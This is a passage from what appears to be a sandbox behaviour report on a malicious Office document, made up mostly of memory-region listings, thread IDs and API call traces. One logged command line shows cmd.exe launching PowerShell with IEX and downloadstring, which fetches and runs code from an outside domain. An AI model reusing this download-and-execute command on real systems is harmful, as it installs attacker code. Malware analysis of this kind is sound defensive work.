= 597 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 598 start_va = 0x3100000 end_va = 0x3103fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 599 start_va = 0x5660000 end_va = 0x5670fff entry_point = 0x5660000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 600 start_va = 0x5680000 end_va = 0x5693fff entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 601 start_va = 0x56a0000 end_va = 0x56bdfff entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 602 start_va = 0x56c0000 end_va = 0x56c3fff entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 603 start_va = 0x56e0000 end_va = 0x56e2fff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 604 start_va = 0x56f0000 end_va = 0x56f1fff entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 605 start_va = 0x57d0000 end_va = 0x57d1fff entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 606 start_va = 0x5c40000 end_va = 0x5c40fff entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 607 start_va = 0x5c50000 end_va = 0x5c51fff entry_point = 0x0 region_type = private name = "private_0x0000000005c50000" filename = "" Region: id = 608 start_va = 0x87c0000 end_va = 0x87c0fff entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 609 start_va = 0x87d0000 end_va = 0x87d1fff entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 610 start_va = 0x112b0000 end_va = 0x11642fff entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 611 start_va = 0x11650000 end_va = 0x11b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 612 start_va = 0x11b30000 end_va = 0x12afffff entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 613 start_va = 0x7fef1c10000 end_va = 0x7fef1c1cfff entry_point = 0x7fef1c10000 region_type = mapped_file name = "msostyle.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOSTYLE.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msostyle.dll") Region: id = 629 start_va = 0x2030000 end_va = 0x2044fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 630 start_va = 0x2050000 end_va = 0x2050fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 631 start_va = 0x2060000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 632 start_va = 0x2080000 end_va = 0x2080fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 633 start_va = 0x3090000 end_va = 0x3093fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 634 start_va = 0x30a0000 end_va = 0x30a3fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 635 start_va = 0x30d0000 end_va = 0x30d2fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 636 start_va = 0x30e0000 end_va = 0x30e1fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 637 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 638 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 639 start_va = 0x74e0000 end_va = 0x755ffff entry_point = 0x0 region_type = private name = "private_0x00000000074e0000" filename = "" Region: id = 640 start_va = 0x75c0000 end_va = 0x763ffff entry_point = 0x0 region_type = private name = "private_0x00000000075c0000" filename = "" Region: id = 641 start_va = 0x7640000 end_va = 0x7741fff entry_point = 0x0 region_type = private name = "private_0x0000000007640000" filename = "" Region: id = 642 start_va = 0x12b00000 end_va = 0x13acffff entry_point = 0x0 region_type = private name = "private_0x0000000012b00000" filename = "" Region: id = 643 start_va = 0x13ad0000 end_va = 0x14e24fff entry_point = 0x13ad0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 644 start_va = 0x7fef6a30000 end_va = 0x7fef6b4efff entry_point = 0x7fef6a30000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 1959 start_va = 0x2030000 end_va = 0x2049fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1960 start_va = 0x2050000 end_va = 0x2052fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1961 start_va = 0x2070000 end_va = 0x2072fff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1962 start_va = 0x2080000 end_va = 0x2082fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1963 start_va = 0x3090000 end_va = 0x3092fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1964 start_va = 0x30a0000 end_va = 0x30a2fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 1965 start_va = 0x30d0000 end_va = 0x30dffff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 1966 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1967 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1968 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1969 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 1970 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1971 start_va = 0x3330000 end_va = 0x3330fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1972 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 1973 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 1974 start_va = 0x3fe0000 end_va = 0x3fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1975 start_va = 0x3ff0000 end_va = 0x3ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 1976 start_va = 0x4000000 end_va = 0x4000fff entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1977 start_va = 0x4010000 end_va = 0x4010fff entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 1978 start_va = 0x4020000 end_va = 0x4020fff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 1979 start_va = 0x5680000 end_va = 0x5680fff entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 1980 start_va = 0x110d0000 end_va = 0x111cffff entry_point = 0x0 region_type = private name = "private_0x00000000110d0000" filename = "" Region: id = 1981 start_va = 0x11780000 end_va = 0x117fffff entry_point = 0x0 region_type = private name = "private_0x0000000011780000" filename = "" Region: id = 1982 start_va = 0x7fef7720000 end_va = 0x7fef77e5fff entry_point = 0x7fef7720000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1983 start_va = 0x3f70000 end_va = 0x3f70fff entry_point = 0x3f70000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1984 start_va = 0x3f80000 end_va = 0x3f80fff entry_point = 0x3f80000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1985 start_va = 0x3f90000 end_va = 0x3f90fff entry_point = 0x3f90000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1986 start_va = 0x3fb0000 end_va = 0x3fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 1987 start_va = 0x4030000 end_va = 0x4030fff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 1988 start_va = 0x4040000 end_va = 0x4040fff entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 1989 start_va = 0x7750000 end_va = 0x784ffff entry_point = 0x7750000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1990 start_va = 0x10850000 end_va = 0x1094ffff entry_point = 0x10850000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1991 start_va = 0x10e10000 end_va = 0x10f0ffff entry_point = 0x10e10000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1992 start_va = 0x7fefb6f0000 end_va = 0x7fefb703fff entry_point = 0x7fefb6f0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1993 start_va = 0x7fefc580000 end_va = 0x7fefc59cfff entry_point = 0x7fefc580000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1994 start_va = 0x2060000 end_va = 0x2060fff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1995 start_va = 0x3fa0000 end_va = 0x3fa4fff entry_point = 0x3fa0000 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 1996 start_va = 0x3fc0000 end_va = 0x3fc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 1997 start_va = 0x4050000 end_va = 0x4051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004050000" filename = "" Region: id = 1998 start_va = 0x70f40000 end_va = 0x72295fff entry_point = 0x70f40000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1999 start_va = 0x7fee8e00000 end_va = 0x7fee9070fff entry_point = 0x7fee8e00000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 2000 start_va = 0x7fef80e0000 end_va = 0x7fef8114fff entry_point = 0x7fef80e0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 2001 start_va = 0x2050000 end_va = 0x2051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 2002 start_va = 0xa460000 end_va = 0xa55ffff entry_point = 0x0 region_type = private name = "private_0x000000000a460000" filename = "" Region: id = 2003 start_va = 0x7fefbc70000 end_va = 0x7fefbc9bfff entry_point = 0x7fefbc70000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Thread: id = 1 os_tid = 0xa8c Thread: id = 2 os_tid = 0xa88 Thread: id = 3 os_tid = 0xa84 Thread: id = 4 os_tid = 0xa80 Thread: id = 5 os_tid = 0xa7c Thread: id = 6 os_tid = 0xa78 Thread: id = 7 os_tid = 0xa74 Thread: id = 8 os_tid = 0xa70 Thread: id = 9 os_tid = 0xa6c Thread: id = 10 os_tid = 0xa68 Thread: id = 11 os_tid = 0xa1c Thread: id = 12 os_tid = 0xa14 Thread: id = 13 os_tid = 0x9f0 Thread: id = 14 os_tid = 0x9d0 Thread: id = 15 os_tid = 0x9cc Thread: id = 16 os_tid = 0x9c8 Thread: id = 17 os_tid = 0x9c4 Thread: id = 18 os_tid = 0x9c0 Thread: id = 19 os_tid = 0x9bc Thread: id = 20 os_tid = 0x9b8 Thread: id = 21 os_tid = 0x9b4 Thread: id = 22 os_tid = 0x9b0 [0125.416] MsoSetLVProperty () returned 0x1 [0125.428] MsoSetLVProperty () returned 0x1 [0125.428] MsoSetLVProperty () returned 0x1d4406b27b9b5c1 [0125.428] GetLocalTime (in: lpSystemTime=0x1cf030 | out: lpSystemTime=0x1cf030*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0xa, wSecond=0x3, wMilliseconds=0x6c)) [0125.428] MsoSetLVProperty () returned 0x1 Thread: id = 23 os_tid = 0xa90 Thread: id = 24 os_tid = 0xa94 Thread: id = 25 os_tid = 0xa98 Thread: id = 26 os_tid = 0xa9c Thread: id = 27 os_tid = 0xaa0 Thread: id = 28 os_tid = 0xaa4 Thread: id = 29 os_tid = 0xab4 Thread: id = 30 os_tid = 0xab8 Thread: id = 31 os_tid = 0xaf0 Thread: id = 32 os_tid = 0xaf4 Thread: id = 33 os_tid = 0xb40 Thread: id = 34 os_tid = 0xb44 Thread: id = 35 os_tid = 0xb48 Thread: id = 36 os_tid = 0xb4c Thread: id = 37 os_tid = 0xb50 Thread: id = 38 os_tid = 0xb54 Thread: id = 39 os_tid = 0xba8 Thread: id = 40 os_tid = 0xbac Thread: id = 41 os_tid = 0xbb0 Thread: id = 66 os_tid = 0x6cc Thread: id = 67 os_tid = 0x71c Thread: id = 68 os_tid = 0x2e0 Thread: id = 69 os_tid = 0x574 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6f5bf000" os_pid = "0xbe0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9ac" cmd_line = "CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 614 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 615 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 616 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 617 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 618 start_va = 0x4a030000 end_va = 0x4a088fff entry_point = 0x4a030000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 619 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 620 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 621 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 622 start_va = 0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 623 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 624 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 625 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 626 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 627 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 628 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 645 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 646 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 647 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 648 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 649 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 650 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 651 start_va = 0x7fee9e10000 end_va = 0x7fee9e17fff entry_point = 0x7fee9e10000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 652 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 653 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 654 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 655 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 656 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 657 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 658 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 659 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 660 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 661 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 662 start_va = 0x580000 end_va = 0x707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 663 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 664 start_va = 0x8a0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 665 start_va = 0x1ca0000 end_va = 0x1fe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 666 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 667 start_va = 0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 668 start_va = 0x1ff0000 end_va = 0x22befff entry_point = 0x1ff0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 42 os_tid = 0xbe4 [0125.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f9b0 | out: lpSystemTimeAsFileTime=0x18f9b0*(dwLowDateTime=0x562ae410, dwHighDateTime=0x1d4406f)) [0125.495] GetCurrentProcessId () returned 0xbe0 [0125.495] GetCurrentThreadId () returned 0xbe4 [0125.495] GetTickCount () returned 0x2b9fb [0125.495] QueryPerformanceCounter (in: lpPerformanceCount=0x18f9b8 | out: lpPerformanceCount=0x18f9b8*=24371057039) returned 1 [0125.497] GetModuleHandleW (lpModuleName=0x0) returned 0x4a030000 [0125.497] __set_app_type (_Type=0x1) [0125.497] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a057810) returned 0x0 [0125.497] __getmainargs (in: _Argc=0x4a07a608, _Argv=0x4a07a618, _Env=0x4a07a610, _DoWildCard=0, _StartInfo=0x4a05e0f4 | out: _Argc=0x4a07a608, _Argv=0x4a07a618, _Env=0x4a07a610) returned 0 [0125.498] GetCurrentThreadId () returned 0xbe4 [0125.498] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbe4) returned 0x3c [0125.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77930000 [0125.498] GetProcAddress (hModule=0x77930000, lpProcName="SetThreadUILanguage") returned 0x77946d40 [0125.498] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.498] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f948 | out: phkResult=0x18f948*=0x0) returned 0x2 [0125.499] VirtualQuery (in: lpAddress=0x18f930, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0125.499] GetConsoleOutputCP () returned 0x1b5 [0125.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0125.499] SetConsoleCtrlHandler (HandlerRoutine=0x4a053184, Add=1) returned 1 [0125.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.499] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0125.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a05e194 | out: lpMode=0x4a05e194) returned 1 [0125.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.500] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0125.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.501] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a05e198 | out: lpMode=0x4a05e198) returned 1 [0125.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.501] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0125.501] GetEnvironmentStringsW () returned 0x2c8c50* [0125.501] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.502] GetEnvironmentStringsW () returned 0x2c8c50* [0125.502] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.502] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e808 | out: phkResult=0x18e808*=0x44) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x18, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x1, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x4, lpData=0x18e820*=0x0, lpcbData=0x18e804*=0x4) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: 